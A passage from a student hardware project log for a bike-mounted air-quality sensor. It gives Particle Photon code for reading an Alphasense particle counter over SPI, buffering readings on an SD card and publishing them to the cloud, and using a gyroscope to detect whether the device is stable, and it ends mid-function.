Once these modifications were done the code found in this **[link](https://github.com/waggle-sensor/summer2018/blob/master/bike_waggle/sensorgram/sensogram-main-8.ino)** was used to cater all the devices thus far used.
## Aug 9-10
### Task 25 - Running the Alpha Sensor on the Particle
#### Task 25.1 - Iteration 1
At this point having all the sensors connected to the Photon itself was considered. This would lead to the bike waggle being less expensive and less bulky. The Photon provides two SPI interfaces. The second SPI interface was used to connect the Alpha Sense to the Photon.
The following code was used in the implementation.
```
// Alpha Sensor histogram
// Alphasensor
#define ALPHA_SLAVE_PIN D5
boolean flagON = false;
String AlphaBin0 ;
String AlphaBin1 ;
String AlphaBin2 ;
String AlphaBin3 ;
String AlphaBin4 ;
String AlphaBin5 ;
String AlphaBin6 ;
String AlphaBin7 ;
String AlphaBin8 ;
String AlphaBin9 ;
String AlphaBin10;
String AlphaBin11;
String AlphaBin12;
String AlphaBin13;
String AlphaBin14 ;
String AlphaBin15 ;
String AlphaBin16 ;
String AlphaBin17 ;
String AlphaBin18 ;
String AlphaBin19 ;
String AlphaBin20 ;
String AlphaBin21 ;
String AlphaBin22 ;
String AlphaBin23 ;
String AlphaBin24 ;
// Reading the PM values - PM*1000
String AlphaPM1 ;
String AlphaPM2_5;
String AlphaPM10 ;
//
bool Alpha_Status_Main = false;
bool Alpha_Status_Fan = false;
void Initialize_SPI1()
{
Serial.println("Initialization");
delay(20000);
Serial.println("Init Alpha ");
SPI1.begin(ALPHA_SLAVE_PIN);
SPI1.setBitOrder(MSBFIRST);
SPI1.setDataMode(SPI_MODE1);
SPI1.setClockSpeed(5000000);
delay(1000);
pinMode(ALPHA_SLAVE_PIN, OUTPUT);
Serial.println("Begining SPI");
}
bool Check_Alpha_Status(){
byte Alpha_Status_Byte;
int Repeats=0;
SPI1.beginTransaction(__SPISettings(5000000,MSBFIRST, SPI_MODE1));
digitalWrite(ALPHA_SLAVE_PIN, LOW);
SPI1.transfer(0xCF);
delay(10);
Alpha_Status_Byte = SPI1.transfer(0xCF);
// Rechecking
while(Alpha_Status_Byte!=0xF3&&(Repeats<10)){
delay(10);
Alpha_Status_Byte = SPI1.transfer(0xCF);
Repeats=Repeats+1;
}
digitalWrite(ALPHA_SLAVE_PIN, HIGH);
SPI1.endTransaction();
// Give Status
Serial.println("Checking Status");
Serial.println(Alpha_Status_Byte,HEX);
if (Alpha_Status_Byte == 0xF3){
Serial.println("Sensor Ready to Transmit");
return true;
}else{
Serial.println("Sensor Failed to Initiate");
return false;
}
}
// Send the 0x03 command byte to the Alphasense OPC three times (one byte
// per chip-select pulse) and check that the echoed status bytes match the
// expected {0xF3, 0x03, 0x03} sequence. Returns true only on a full match.
bool Turn_Alpha_On(){
    byte Alpha_Status_Bytes[3];
    byte expected[] = {0xF3, 0x03, 0x03};
    Serial.println("Turning Alpha On");
    digitalWrite(ALPHA_SLAVE_PIN, LOW);
    Alpha_Status_Bytes[0] = SPI1.transfer(0x03);
    digitalWrite(ALPHA_SLAVE_PIN, HIGH);
    delay(10);
    digitalWrite(ALPHA_SLAVE_PIN, LOW);
    Alpha_Status_Bytes[1] = SPI1.transfer(0x03);
    digitalWrite(ALPHA_SLAVE_PIN, HIGH);
    delay(10);
    digitalWrite(ALPHA_SLAVE_PIN, LOW);
    Alpha_Status_Bytes[2] = SPI1.transfer(0x03);
    digitalWrite(ALPHA_SLAVE_PIN, HIGH);
    Serial.println(Alpha_Status_Bytes[0],HEX);
    Serial.println(Alpha_Status_Bytes[1],HEX);
    Serial.println(Alpha_Status_Bytes[2],HEX);
    // BUG FIX: `Alpha_Status_Bytes == expected` compared the two array
    // POINTERS, which is always false. Compare the contents instead.
    for (int i = 0; i < 3; i++) {
        if (Alpha_Status_Bytes[i] != expected[i]) {
            return false;
        }
    }
    return true;
}
void Read_Alpha()
{
byte Alpha_Status_Bytes[2];
byte Alpha_Readings[86];
Serial.println("Reading Alpha Sensor Values");
digitalWrite(ALPHA_SLAVE_PIN, LOW);
Alpha_Status_Bytes[0] = SPI1.transfer(0x30);
digitalWrite(ALPHA_SLAVE_PIN, HIGH);
delay(10);
digitalWrite(ALPHA_SLAVE_PIN, LOW);
Alpha_Status_Bytes[1] = SPI1.transfer(0x30);
digitalWrite(ALPHA_SLAVE_PIN, HIGH);
delay(10);
digitalWrite(ALPHA_SLAVE_PIN,LOW);
for (int i = 0; i<86; i++){
Alpha_Readings[i] = SPI1.transfer(0x30);
delayMicroseconds(10);
}
digitalWrite(ALPHA_SLAVE_PIN,HIGH);
Serial.println("Alpha Bytes");
Serial.println(Alpha_Status_Bytes[0],HEX);
Serial.println(Alpha_Status_Bytes[1],HEX);
Serial.println("Done Reading Alpha Values");
delay(1000);
for (int i = 0; i<86; i++){
Serial.println("Alplha Byte "+String(i)+" : "+String(Alpha_Readings[i]));
delay(10);
}
delay(1000);
for (int i = 0; i<48; i=i+2){
Serial.println("Bin Value "+String(i/2)+" : "+String(Get_Int_From_Bytes(Alpha_Readings[i],Alpha_Readings[i+1])));
delay(100);
}
Serial.println("Temprature: " +String(Alpha_Readings[56],HEX)+"|"+String(Alpha_Readings[57],HEX));
Serial.println("Humidity: " +String(Alpha_Readings[58],HEX)+"|"+String(Alpha_Readings[59],HEX));
Serial.println("SP: " +String(Alpha_Readings[52],HEX)+"|"+String(Alpha_Readings[53],HEX));
delay(1000);
int Temprature = Get_Int_From_Bytes(Alpha_Readings[56],Alpha_Readings[57]);
delay(1000);
int Humidity = Get_Int_From_Bytes(Alpha_Readings[58],Alpha_Readings[59]);
delay(1000);
int Sampling_Time = Get_Int_From_Bytes(Alpha_Readings[52],Alpha_Readings[53]);
delay(1000);
Serial.println("Temprature: " + String(Temprature));
delay(1000);
Serial.println("Humidity: " + String(Humidity));
delay(1000);
Serial.println("Sampling Time: " + String(Sampling_Time));
}
// Assemble a 16-bit value from its low byte (LSB) and high byte (MSB).
int Get_Int_From_Bytes(byte LSB, byte MSB)
{
    // MSB shifted into the upper 8 bits, LSB in the lower 8 bits.
    return (int(MSB) << 8) | int(LSB);
}
// Reinterpret four bytes (little-endian, val0 = least significant) as an
// IEEE754 single-precision float via a type-punning union.
float Get_float_From_Bytes(byte val0, byte val1, byte val2, byte val3)
{
    union {
        byte raw[4];
        float value;
    } converter;
    converter.raw[0] = val0;
    converter.raw[1] = val1;
    converter.raw[2] = val2;
    converter.raw[3] = val3;
    return converter.value;
}
// EXAMPLE USAGE
void setup()
{
Serial.begin(9600);
Serial.println("Hello Computer");
delay(2000);
Serial.println("Serial Opening 1");
delay(2000);
Initialize_SPI1();
delay(2000);
Turn_Alpha_On() ;
delay(5000);
}
void loop() {
Read_Alpha();
delay(5000);
}
```
The current code for the Alpha Sense reads byte values for the Histograms, PM, Sampling times, Temperature and Humidity. The next iteration will be implemented to convert this data to human readable form.
**NOTE: While the Temperature values and the Bin counts derived from the SPI interface made sense, the Humidity values did not match what was displayed on the Alpha Sense software. However, this may not be of our concern, since we are using a separate Humidity Sensor.**
**NOTE: On this iteration more often than not the Alpha Sensor read zeros as histogram counts. This concern will be addressed on the coming iterations**
## Aug 13-17
#### Task 25.2 - Iteration 2
Here the problem of the alpha sensor reading zeros was looked into. It was found out that even though the fan turned on, the laser within the Alpha Sense was not initiated. This was solved using the code given below. In fact, the Alpha Sense OPC N3 gave more control to the user so that the fan, the laser and the high/low gain options were user programmable.
```
void Initialize_Alpha(){
while (!Set_Fan_Digital_Pot_State(true)) {
Serial.println("Still trying to turn on device...");
delay(2500);
}
delay(5000);
// while (!Set_Laser_Digital_Pot_State(true)) {
// Serial.println("Still trying to turn on device...");
// delay(2500);
// }
// delay(5000);
while (!Set_Laser_Power_Switch_State(true)) {
Serial.println("Still trying to turn on device...");
delay(2500);
}
delay(5000);
// while (!Set_Gain_State(true)) {
// Serial.println("Still trying to turn on device...");
// delay(2500);
// }
// delay(5000);
// Resetting Histogram
Read_PM();
}
```
With this addition, a separate program was written to test the implementation of the Alpha Sense.
```
#include "math.h"
// Alpha sensor histogram
// Alphasensor
#define ALPHA_SLAVE_PIN D5
boolean flagON = false;
String AlphaBin0 ;
String AlphaBin1 ;
String AlphaBin2 ;
String AlphaBin3 ;
String AlphaBin4 ;
String AlphaBin5 ;
String AlphaBin6 ;
String AlphaBin7 ;
String AlphaBin8 ;
String AlphaBin9 ;
String AlphaBin10;
String AlphaBin11;
String AlphaBin12;
String AlphaBin13;
String AlphaBin14 ;
String AlphaBin15 ;
String AlphaBin16 ;
String AlphaBin17 ;
String AlphaBin18 ;
String AlphaBin19 ;
String AlphaBin20 ;
String AlphaBin21 ;
String AlphaBin22 ;
String AlphaBin23 ;
String AlphaBin24 ;
// Reading the PM values - PM*1000
String AlphaPM1 ;
String AlphaPM2_5;
String AlphaPM10 ;
bool Alpha_Status_Fan = false;
byte Firmware_Major;
byte Firmware_Minor;
// EXAMPLE USAGE
void setup()
{
Serial.begin(9600);
delay(10000);
Serial.println("------------------");
Initialize_SPI1();
Initialize_Alpha();
delay(2000);
}
void loop() {
if (!Read_Alpha()) {
Serial.println("Failed to read histogram.");
delay(2500);
return;
}
delay(20000);
}
void Initialize_SPI1()
{
Serial.println("Initialization");
delay(2000);
Serial.println("Init SPI");
delay(2000);
SPI1.begin(ALPHA_SLAVE_PIN);
SPI1.setBitOrder(MSBFIRST);
SPI1.setDataMode(SPI_MODE1);
SPI1.setClockSpeed(300000);
delay(1000);
pinMode(ALPHA_SLAVE_PIN, OUTPUT);
Serial.println("Begining SPI");
}
void Initialize_Alpha(){
while (!Set_Fan_Digital_Pot_State(true)) {
Serial.println("Still trying to turn on device...");
delay(2500);
}
delay(5000);
// while (!Set_Laser_Digital_Pot_State(true)) {
// Serial.println("Still trying to turn on device...");
// delay(2500);
// }
// delay(5000);
while (!Set_Laser_Power_Switch_State(true)) {
Serial.println("Still trying to turn on device...");
delay(2500);
}
delay(5000);
// while (!Set_Gain_State(true)) {
// Serial.println("Still trying to turn on device...");
// delay(2500);
// }
// delay(5000);
// Resetting Histogram
Read_PM();
}
// Assert the OPC slave-select line and give the device 1 ms to settle
// before the first SPI byte.
void beginTransfer() {
digitalWrite(ALPHA_SLAVE_PIN, LOW);
delay(1);
}
// Wait 1 ms after the last SPI byte, then release the OPC slave-select line.
void endTransfer() {
delay(1);
digitalWrite(ALPHA_SLAVE_PIN, HIGH);
}
// Repeatedly send `send` over SPI1 until the device answers `want` or
// `timeout` milliseconds elapse. Returns true on a match, false on timeout.
// The 50 ms pause between polls gives the sensor time to become ready.
bool transferUntilMatch(byte send, byte want, unsigned long timeout) {
unsigned long startTime = millis();
while (millis() - startTime < timeout) {
if (SPI1.transfer(send) == want) {
return true;
}
delay(50);
}
return false;
}
// Thin wrapper over SPI1.transfer, for symmetry with begin/endTransfer.
byte transfer(byte send) {
return SPI1.transfer(send);
}
// Switch the OPC fan digital pot on (command 0x03) or off (0x02).
// Returns false when the sensor never acknowledges (0xF3) the command byte.
bool Set_Fan_Digital_Pot_State(bool powered) {
    Serial.println("Setting Fan Digital Pot State");
    beginTransfer();
    if (!transferUntilMatch(0x03, 0xf3, 1000)) {
        Serial.println("Power control timed out.");
        endTransfer(); // BUG FIX: deselect the device; the original left slave-select asserted on timeout
        return false;
    }
    delayMicroseconds(10);
    if (powered) {
        transfer(0x03);
    } else {
        transfer(0x02);
    }
    endTransfer();
    return true;
}
// Switch the OPC laser digital pot on (command 0x05) or off (0x02).
// Returns false when the sensor never acknowledges (0xF3) the command byte.
bool Set_Laser_Digital_Pot_State(bool powered) {
    Serial.println("Setting Laser Digital Pot State");
    beginTransfer();
    if (!transferUntilMatch(0x03, 0xf3, 1000)) {
        Serial.println("Power control timed out.");
        endTransfer(); // BUG FIX: deselect the device; the original left slave-select asserted on timeout
        return false;
    }
    delayMicroseconds(10);
    if (powered) {
        transfer(0x05);
    } else {
        transfer(0x02);
    }
    endTransfer();
    return true;
}
// Switch the laser power switch on (true) or off (false) via the OPC power
// control command. Returns false when the 0xf3 handshake times out.
bool Set_Laser_Power_Switch_State(bool powered) {
  Serial.println("Setting Laser Power Switch State");
  beginTransfer();
  if (!transferUntilMatch(0x03, 0xf3, 1000)) {
    Serial.println("Power control timed out.");
    endTransfer();  // fix: deselect the slave on the failure path too
    return false;
  }
  delayMicroseconds(10);
  // 0x07 powers the laser switch on, 0x02 powers it off.
  transfer(powered ? 0x07 : 0x02);
  endTransfer();
  return true;
}
// Switch the gain state on (true) or off (false) via the OPC power
// control command. Returns false when the 0xf3 handshake times out.
bool Set_Gain_State(bool powered) {
  Serial.println("Setting Laser Gain State");
  beginTransfer();
  if (!transferUntilMatch(0x03, 0xf3, 1000)) {
    Serial.println("Power control timed out.");
    endTransfer();  // fix: deselect the slave on the failure path too
    return false;
  }
  delayMicroseconds(10);
  // 0x09 sets gain on, 0x02 sets it off.
  transfer(powered ? 0x09 : 0x02);
  endTransfer();
  return true;
}
// Request and dump the full 86-byte histogram packet from the Alphasense OPC.
// Decodes temperature, humidity, sampling time (16-bit ints) and
// PM1/PM2.5/PM10 (IEEE-754 singles) from fixed byte offsets and logs them.
// Returns true when the first reply byte is non-zero, false otherwise.
// NOTE(review): on a handshake timeout this returns with the slave still
// selected (no endTransfer()) -- confirm this is intentional.
bool Read_Alpha() {
byte Alpha_Readings[86];
beginTransfer();
// 0x30 = histogram read command; wait for the 0xf3 "ready" acknowledgement.
if (!transferUntilMatch(0x30, 0xf3, 1000)) {
Serial.println("Histogram command failed.");
return false;
}
delay(10);
// Clock out the 86 histogram bytes, one dummy 0x30 write per byte.
for (int i = 0; i<86; i++){
Alpha_Readings[i] = transfer(0x30);
delayMicroseconds(10);
}
endTransfer();
// Dump the raw packet in hex, ten bytes per row.
Serial.println("Histogram:");
for (int i = 0 ; i<86; i++) {
Serial.print(Alpha_Readings[i], HEX);
if (i % 10 == 9) {
Serial.print("\n");
} else {
Serial.print(" ");
}
}
Serial.println();
Serial.println("--------");
// 16-bit little-endian fields at fixed offsets -- offsets assumed to match
// the OPC-N2 histogram layout; TODO confirm against the datasheet.
int Temprature = Get_Int_From_Bytes(Alpha_Readings[56],Alpha_Readings[57]);
int Humidity = Get_Int_From_Bytes(Alpha_Readings[58],Alpha_Readings[59]);
int Sampling_Time = Get_Int_From_Bytes(Alpha_Readings[52],Alpha_Readings[53]);
Serial.println("Temprature: " + String(Temprature));
Serial.println("Humidity: " + String(Humidity));
Serial.println("Sampling Time: " + String(Sampling_Time));
// PM values: 4-byte IEEE-754 single-precision floats, least-significant byte first.
String pm1 = Get_Float_From_Bytes_Single_Precision(Alpha_Readings[60],Alpha_Readings[61],Alpha_Readings[62],Alpha_Readings[63]);
String pm2_5 = Get_Float_From_Bytes_Single_Precision(Alpha_Readings[64],Alpha_Readings[65],Alpha_Readings[66],Alpha_Readings[67]);
String pm10 = Get_Float_From_Bytes_Single_Precision(Alpha_Readings[68],Alpha_Readings[69],Alpha_Readings[70],Alpha_Readings[71]);
Serial.println("pm1 : " + String(pm1));
Serial.println("pm2_5: " + String(pm2_5));
Serial.println("pm10 : " + String(pm10));
Serial.println("-----------------------------------");
// A non-zero first byte is treated as a valid reply.
if(!(Alpha_Readings[0]== 0x00)){
return true;}
else{
return false;
}
}
// Issue the PM read command (0x32) and pull 14 bytes from the OPC, which
// also resets its histogram. Returns true when the first reply byte is
// non-zero, false on handshake timeout or a zero first byte.
bool Read_PM() {
  byte Alpha_Readings[86];
  beginTransfer();
  if (!transferUntilMatch(0x32, 0xf3, 1000)) {
    Serial.println("Histogram command failed.");
    endTransfer();  // fix: deselect the slave on the failure path too
    return false;
  }
  delay(10);
  // Only the first 14 bytes are meaningful for the PM command.
  for (int i = 0; i < 14; i++) {
    Alpha_Readings[i] = transfer(0x32);
    delayMicroseconds(10);
  }
  endTransfer();
  if (!(Alpha_Readings[0] == 0x00)) {
    // fix: this log line was placed after `return true` and never executed.
    Serial.println("Resetting Histogram");
    return true;
  } else {
    return false;
  }
}
// Combine a little-endian byte pair into a 16-bit unsigned value
// (MSB in the high byte, LSB in the low byte).
int Get_Int_From_Bytes(byte LSB, byte MSB)
{
  return (int(MSB) << 8) | int(LSB);
}
// Parse the 8-bit exponent field of an IEEE-754 single from its binary
// string, subtract the bias (127) and return 2^power as a float.
// Sentinels: returns -1 when the unbiased power exceeds 16 ("very large"),
// -2 when it is below -16 ("very small"); callers map these to VTL/VTS.
float Get_Exponent_Single_Precision(String Binary_String){
int Power_Pre=0;
int Power;
float Result;
// Accumulate the unsigned exponent, least-significant bit first.
for(int n=(Binary_String.length()-1);n>=0;n--){
if(Binary_String.charAt(n)=='1'){
Power_Pre = Power_Pre+pow(2,Binary_String.length()-1-n);
}
}
// Remove the IEEE-754 single-precision exponent bias.
Power = Power_Pre -127;
if (Power>16){
Result = -1 ;
}else if (Power<-16){
Result = -2;
}else {
Result = pow(2,Power);
}
return Result;
}
// Reconstruct the IEEE-754 mantissa value (1.fraction) from a binary
// fraction string: bit k contributes 2^-(k+1), plus the implicit leading 1.
float Get_Fraction_Single_Precision(String Binary_String){
  float mantissa = 1;
  for (int bit = 0; bit < Binary_String.length(); bit++) {
    if (Binary_String.charAt(bit) == '1') {
      mantissa = mantissa + pow(2, -(bit + 1));
    }
  }
  return mantissa;
}
// Left-pad a binary string with '0' characters to a width of 8.
// Strings already 8 characters or longer are returned unchanged.
String Add_Leading_Bits_8(String Bits){
  if (Bits.length() >= 8) {
    return Bits;
  }
  String Zeros = "00000000";
  return Zeros.substring(0, 8 - Bits.length()) + Bits;
}
// Manually decode an IEEE-754 single-precision float from four bytes
// (val0 = least significant) and return it as a String.
// Special results: "VTL" for very large exponents, "0" for very small ones,
// "Error" otherwise. NOTE(review): the sign bit is extracted but never
// applied, so negative inputs decode as positive -- confirm intended.
String Get_Float_From_Bytes_Single_Precision(byte val0, byte val1, byte val2, byte val3)
{
// Concatenate the bytes MSB-first into a 32-character binary string.
String All_Binary = Add_Leading_Bits_8(String(val3,BIN))+ Add_Leading_Bits_8(String(val2,BIN))+ Add_Leading_Bits_8(String(val1,BIN))+ Add_Leading_Bits_8(String(val0,BIN));
// //String All_Binary ="01000000110110011001100110011010";
Serial.println("Binary Value :"+ All_Binary) ;
// IEEE-754 single layout: 1 sign bit, 8 exponent bits, 23 fraction bits.
String Sign_Binary = All_Binary.substring(0,1);
String Exponent_Binary = All_Binary.substring(1,9);
String Fraction_Binary = All_Binary.substring(9,32);
float Exponent = Get_Exponent_Single_Precision(Exponent_Binary);
float Fraction = Get_Fraction_Single_Precision(Fraction_Binary);
if (Exponent>0){
float Float_Value = Exponent*Fraction;
return String(Float_Value);
}
// Sentinel -1 from the exponent decoder: value too large to represent here.
else if (Exponent==-1){
Serial.println("VTL") ;
return "VTL";
}
// Sentinel -2: value too small; reported as zero.
else if(Exponent==-2)
{
Serial.println("VTS") ;
return "0";
}else{
Serial.println("Error") ;
return "Error";
}
}
// Return true iff the first `length` bytes of the two arrays are identical.
bool Compare(byte array1[], byte array2[], int length) {
  int idx = 0;
  while (idx < length) {
    if (array1[idx] != array2[idx]) {
      return false;
    }
    ++idx;
  }
  return true;
}
```
## Aug 20-23
#### Task 26 - Finalized SD Card Implementation
The previous code for handling the SD card only supported publishing data to the SD card. For this iteration, the SD card implementation can publish the data to the cloud while deleting what has already been published. The final code for the SD card implementation is given here.
```
// This #include statement was automatically added by the Particle IDE.
#include <SdFat.h>
// Pick an SPI configuration.
// See SPI configuration section below (comments are for photon).
#define SPI_CONFIGURATION 0
SdFat sd;
SdFile file;
String Bike_Waggle_ID = "Lakithas_Photon";
const uint8_t chipSelect = A2;
//------------------------------------------------------------------------------
// SCK => A3, MISO => A4, MOSI => A5, SS => A2 (default)
File myFile;
// Index of the next sensorgram file to be published to the cloud.
int Sensorgram_Publish_Index;
// Index of the next sensorgram file to be written.
int Sensorgram_Reading_Index;
// Boot: open serial, give USB time to enumerate, then mount the SD card
// and restore the persisted sensorgram indices.
void setup() {
Initialize_Serial();
delay(10000);
Initialize_SD();
delay(1000);
//Sensogram_Publisher();
}
// Demo cycle: write three test sensorgrams to the card, then publish
// (and delete) the oldest unpublished one, every five seconds.
void loop() {
Serial.println("Reading Index"+String(Sensorgram_Reading_Index));
Write_Data_To_Sensorgram_Waggle(" Hello Sensorgam");
Write_Data_To_Sensorgram_Waggle(" Hello Sensorgam");
Write_Data_To_Sensorgram_Waggle(" Hello Sensorgam");
Publish_Data_To_Cloud_Waggle();
//Publish_Data_To_Cloud_Waggle();
delay(5000);
}
// Open the USB serial port at 9600 baud for logging.
void Initialize_Serial(){
Serial.begin(9600);
// Wait for USB Serial
}
// SD Card functions
// Mount the SD card, create the data/sensorgram folders, write the log
// header, and load (or initialize to 1) the persisted reading/publish
// indices used to round-trip sensorgrams through the card.
void Initialize_SD(){
  if (sd.begin(chipSelect, SPI_HALF_SPEED)) {
    Serial.println("SD Initiated");
  }else{
    // fix: the failure branch previously printed the success message
    // ("SD Initiated") too, making mount failures invisible in the log.
    Serial.println("SD Initiation Failed");
  }
  // Create a new folder for raw data.
  if (sd.mkdir(Bike_Waggle_ID+"_Data")) {
    Serial.println("Data Folder Created");
  }else{
    Serial.println("Data Folder not Created");
  }
  // Create a new folder for sensorgrams.
  if (sd.mkdir(Bike_Waggle_ID+"_Sensorgram")) {
    Serial.println("Sensorgram Folder Created");
  }else{
    Serial.println("Sensorgram Folder Creation Failed");
  }
  // Write the log-file header lines.
  Serial.println("Data File Opended");
  Write_Data_To_SD_Waggle("# Project Bike Waggle");
  Write_Data_To_SD_Waggle("# Version 1.0");
  Write_Data_To_SD_Waggle("# Bike Waggle - "+Bike_Waggle_ID);
  Write_Data_To_SD_Waggle("# Logs begin at " + Time.timeStr());
  Write_Data_To_SD_Waggle("# <Date_Time>,<Sensor>,<Parametor>,<Data>");
  // Restore the sensorgram reading index, or create the file starting at 1.
  if (sd.exists(Bike_Waggle_ID+"_Sensorgram/Reading_Index.txt"))
  {
    Serial.println("File Already Exists");
    Sensorgram_Reading_Index = atoi(Read_Data_from_SD(Bike_Waggle_ID+"_Sensorgram/Reading_Index.txt"));
  } else{
    Serial.println("File Does Not Exist");
    myFile.open(Bike_Waggle_ID+"_Sensorgram/Reading_Index.txt", O_CREAT | O_WRITE | O_AT_END) ;
    Serial.println("Reading Index File Opended");
    myFile.println("1");
    myFile.close();
    Sensorgram_Reading_Index = 1;
  }
  // Restore the sensorgram publish index, or create the file starting at 1.
  if (sd.exists(Bike_Waggle_ID+"_Sensorgram/Publish_Index.txt"))
  {
    Serial.println("File Already Exists");
    Sensorgram_Publish_Index= atoi(Read_Data_from_SD(Bike_Waggle_ID+"_Sensorgram/Publish_Index.txt"));
  } else{
    Serial.println("Publish File Does Not Exist");
    myFile.open(Bike_Waggle_ID+"_Sensorgram/Publish_Index.txt", O_CREAT | O_WRITE | O_AT_END) ;
    Serial.println("Publish Index File Opended");
    myFile.println("1");
    myFile.close();
    Sensorgram_Publish_Index = 1;
  }
}
// Read the entire file at `Path` into a String and return it.
// Returns "-1" when the file cannot be opened.
String Read_Data_from_SD(String Path){
  myFile = sd.open(Path);
  if (!myFile) {
    // if the file didn't open, print an error and signal failure:
    Serial.println("No Such File");
    return "-1";
  }
  Serial.println("Reading:"+Path);
  // Accumulate bytes one at a time until the file is exhausted.
  String contents = "";
  while (myFile.available()) {
    contents.concat((char) myFile.read());
  }
  myFile.close();
  return contents;
}
// Append one line of `Data` to the running readings log, creating the
// file on first use. Logs an error when the file cannot be opened.
void Write_Data_To_SD_Waggle(String Data){
  bool opened = myFile.open(Bike_Waggle_ID+"_Data/Readings.txt", O_CREAT | O_WRITE | O_AT_END);
  if (!opened)
  {
    Serial.println("Data File Not Open");
    return;
  }
  Serial.println("Data File Opended");
  myFile.println(Data);
  myFile.close();
}
// Write one sensorgram payload to a new zero-padded file named after the
// current reading index, then advance the index and persist it.
// NOTE(review): Reading_Index.txt is reopened with O_WRITE but no O_TRUNC,
// so the new value overwrites from position 0; this is safe only while the
// index string never gets shorter -- confirm.
void Write_Data_To_Sensorgram_Waggle(String Data){
// Create the next sensorgram file (e.g. .../00000042.txt).
if (myFile.open(Bike_Waggle_ID+"_Sensorgram/"+Add_Leading_Zeros_8(Sensorgram_Reading_Index)+".txt", O_CREAT | O_WRITE)) {
Serial.println("Sensorgram File Opended");
myFile.print(Data);
myFile.close();
Sensorgram_Reading_Index = Sensorgram_Reading_Index+1;
// Persist the advanced index so it survives a reboot.
if (myFile.open(Bike_Waggle_ID+"_Sensorgram/Reading_Index.txt", O_CREAT | O_WRITE )){
Serial.println("Sensorgram File Opended");
myFile.print(String(Sensorgram_Reading_Index));
myFile.close();
}
}else
{
Serial.println("Data File Not Open");
}
}
// Publish the oldest unpublished sensorgram to the Particle cloud.
// Only on a successful publish is the file deleted, the publish index
// advanced, and the index persisted -- so a failed publish is retried on
// the next call.
void Publish_Data_To_Cloud_Waggle(){
String Path =Bike_Waggle_ID+"_Sensorgram/"+Add_Leading_Zeros_8(Sensorgram_Publish_Index)+".txt";
// Nothing to do once the publisher has caught up with the writer.
if(Sensorgram_Publish_Index<Sensorgram_Reading_Index)
{
if (sd.exists(Path))
{
String Sensorgram_Str = Read_Data_from_SD(Path);
Serial.println("Sensorgram Read for Publishing");
// "-1" is the Read_Data_from_SD open-failure sentinel.
if(!Sensorgram_Str.equals("-1"))
{
if(Particle.publish("Sensorgram",Sensorgram_Str))
{
Sensorgram_Publish_Index = Sensorgram_Publish_Index+1;
// Delete the file only after a confirmed publish.
sd.remove(Path);
if (myFile.open(Bike_Waggle_ID+"_Sensorgram/Publish_Index.txt", O_CREAT | O_WRITE )){
Serial.println("Publish Index File Opened");
myFile.print(String(Sensorgram_Publish_Index));
myFile.close();
}
}
}
}
}
}
// Take from Conversions
String Add_Leading_Zeros_8(int val){
String Zeros = "00000000" ;
String Val_Str = String(val);
String Final;
if (Val_Str.length()<Zeros.length())
{
Final = Zeros.substring(0,Zeros.length()-Val_Str.length())+Val_Str;
}
else{
Final = Val_Str;
}
return Final;
}
```
## September 27-31
#### Task 27 - Seeking Device Stability through the Gyroscope
The Bike Waggle device is meant to implement code that checks the device's stability on each loop iteration. The Bike Waggle will attempt to publish more data while the device is stable and, on the other hand, will read data more frequently while in motion.
The following code makes use of the gyro rates read by the gyroscope to determine the device's stability state.
```
// Reads the MPU9250 IMU (accelerometer, gyroscope, magnetometer), packs the
// readings for logging, updates the quaternion filter / Euler angles, and
// sets Device_Stable: true when the summed squared gyro rates fall below the
// threshold (device at rest), false otherwise or when the IMU is offline.
void Read_MPU9250_BW()
{
  if (myIMU.readByte(MPU9250_ADDRESS, INT_STATUS) & 0x01) // data-ready flag set?
  {
    MPU9250_Online = true;

    // --- Accelerometer: raw ADC counts -> g's (scale set by getAres) ---
    myIMU.readAccelData(myIMU.accelCount);
    myIMU.getAres();
    DateTime nowAcc = rtc.now();
    myIMU.ax = (float)myIMU.accelCount[0]*myIMU.aRes; // - accelBias[0];
    myIMU.ay = (float)myIMU.accelCount[1]*myIMU.aRes; // - accelBias[1];
    myIMU.az = (float)myIMU.accelCount[2]*myIMU.aRes; // - accelBias[2];

    // --- Gyroscope: raw ADC counts -> degrees per second ---
    myIMU.readGyroData(myIMU.gyroCount);
    myIMU.getGres();
    DateTime nowGyro = rtc.now();
    myIMU.gx = (float)myIMU.gyroCount[0]*myIMU.gRes;
    myIMU.gy = (float)myIMU.gyroCount[1]*myIMU.gRes;
    myIMU.gz = (float)myIMU.gyroCount[2]*myIMU.gRes;

    // --- Magnetometer: raw counts -> milliGauss, minus user environmental
    // bias corrections and times the factory calibration. ---
    myIMU.readMagData(myIMU.magCount);
    myIMU.getMres();
    myIMU.magbias[0] = +470.;  // user environmental corrections, milliGauss
    myIMU.magbias[1] = +120.;
    myIMU.magbias[2] = +125.;
    DateTime nowMag = rtc.now();
    myIMU.mx = (float)myIMU.magCount[0]*myIMU.mRes*myIMU.magCalibration[0] -
               myIMU.magbias[0];
    myIMU.my = (float)myIMU.magCount[1]*myIMU.mRes*myIMU.magCalibration[1] -
               myIMU.magbias[1];
    myIMU.mz = (float)myIMU.magCount[2]*myIMU.mRes*myIMU.magCalibration[2] -
               myIMU.magbias[2];

    // Must be called before updating quaternions!
    myIMU.updateTime();

    // Axes are remapped (ay/ax swapped, mz sign) to reconcile the MPU-9250
    // accel/gyro frame with the magnetometer frame; gyro passed in rad/s.
    MahonyQuaternionUpdate(myIMU.ax, myIMU.ay, myIMU.az, myIMU.gx*DEG_TO_RAD,
                           myIMU.gy*DEG_TO_RAD, myIMU.gz*DEG_TO_RAD, myIMU.my,
                           myIMU.mx, myIMU.mz, myIMU.deltat);
    myIMU.delt_t = millis() - myIMU.count;

    // Snapshot the readings in the units used for packing.
    float MPU9250AccelerationX = 1000*myIMU.ax;  // milli-g
    float MPU9250AccelerationY = 1000*myIMU.ay;
    float MPU9250AccelerationZ = 1000*myIMU.az;
    float MPU9250GyroRateX = myIMU.gx;           // deg/s
    float MPU9250GyroRateY = myIMU.gy;
    float MPU9250GyroRateZ = myIMU.gz;
    float MPU9250MagFeildX = myIMU.mx;           // milliGauss
    float MPU9250MagFeildY = myIMU.my;
    float MPU9250MagFeildZ = myIMU.mz;
    // NOTE(review): tempCount is not refreshed in this function (no
    // readTempData call) -- the temperature may be stale; confirm.
    float MPU9250Temprature = (((float) myIMU.tempCount) / 333.87 + 21.0);

    MPU9250_Accelaration_X.Pack(Get_Current_Time_HEX(nowAcc),Float_32_to_Hex(&MPU9250AccelerationX),Get_Current_Time_SD(nowAcc),String(MPU9250AccelerationX));
    MPU9250_Accelaration_Y.Pack(Get_Current_Time_HEX(nowAcc),Float_32_to_Hex(&MPU9250AccelerationY),Get_Current_Time_SD(nowAcc),String(MPU9250AccelerationY));
